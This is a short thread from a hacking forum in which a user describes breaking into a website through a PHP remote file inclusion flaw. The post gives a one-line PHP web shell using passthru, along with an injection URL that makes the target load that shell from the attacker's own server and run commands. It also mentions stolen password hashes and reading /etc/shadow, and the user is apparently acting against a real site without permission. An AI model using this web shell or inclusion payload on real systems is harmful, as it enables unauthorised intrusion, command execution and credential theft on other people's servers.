Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

next step

  1. Home
  2. Forum
  3. Web hacking
  4. next step

ghost's Avatar

ghost

0 0

I recently found a web site vuln to php injection. but there are somethings that make no sense. I have the password hashes, i can read all the php sources i can see the files and directories. but… the first thing is, lets say i have this code in http://myserver/cmd.php:

<? passthru($cmd); ?>

when i inject it like this: http://target.com/index.php?page=http://myserver/cmd.php?cmd=ls it doesn't work, but when i change the source to:

<? passthru("ls"); ?>

it works and shows the list of files. i'm wondering why?? is there any problem with that php script??

secondly, it seems like i can access files and even etc/shadow but i can't edit/remove/make new files and directories. can you explain why is it like this??

EDIT: never mind :)

GreyFox